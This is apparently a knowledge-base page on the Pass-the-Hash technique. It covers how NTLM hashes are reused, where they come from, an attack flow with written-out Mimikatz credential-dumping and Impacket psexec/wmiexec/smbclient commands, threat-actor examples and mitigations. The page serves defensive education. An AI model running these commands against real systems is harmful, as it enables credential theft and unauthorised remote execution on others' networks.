Pass-the-Hash (PtH)
Status: Scaffold — content in progress
ATT&CK: T1550.002 — Use Alternate Authentication Material: Pass the Hash
Platforms: Windows
Severity: Critical
What It Exploits
NTLM authentication sends a hash of the password in response to a challenge. If you have the NTLM hash, you can authenticate as that user without knowing the password.
Sources of NTLM hashes:
- LSASS memory dump (Mimikatz, pypykatz)
- NTDS.dit extraction (DCSync, volume shadow copy)
- SAM database on local machine
- Impacket secretsdump.py
Attack Flow
1. Dump NTLM hash (example: from LSASS)
mimikatz# sekurlsa::logonpasswords
2. Use hash to authenticate
# SMB (file share access)
smbclient.py -hashes :NTLMhash domain/Administrator@target
# Remote execution
psexec.py -hashes :NTLMhash domain/Administrator@target
# WMI
wmiexec.py -hashes :NTLMhash domain/Administrator@target
Conditions Required
- NTLM authentication not disabled
- Have NTLM hash of target user
- Target system allows remote auth (SMB open, WMI accessible)
CTI Examples
Pass-the-Hash is one of the most widely used lateral movement techniques across all threat actor categories.
APT28 (Fancy Bear): documented use of Mimikatz + PtH in multiple intrusions targeting government and defense.
Evidence label: Reported | Confidence: High | Source reliability: B2
Ransomware operators (LockBit, BlackCat, Conti): PtH is a standard step in the encryption chain after initial foothold.
Evidence label: Observed | Confidence: High | Source reliability: A1
Mitigations
- Credential Guard: isolates NTLM hashes from LSASS — hashes stored in secure enclave
- Protected Users group: disables NTLM for group members
- Disable remote SAM queries (restrict which accounts can connect remotely)
- Local Administrator Password Solution (LAPS): unique local admin password per machine
Cross-Links
| Topic | Link |
|---|---|
| NTLM Protocol | ntlm |
| Detection | detect-pass-the-hash |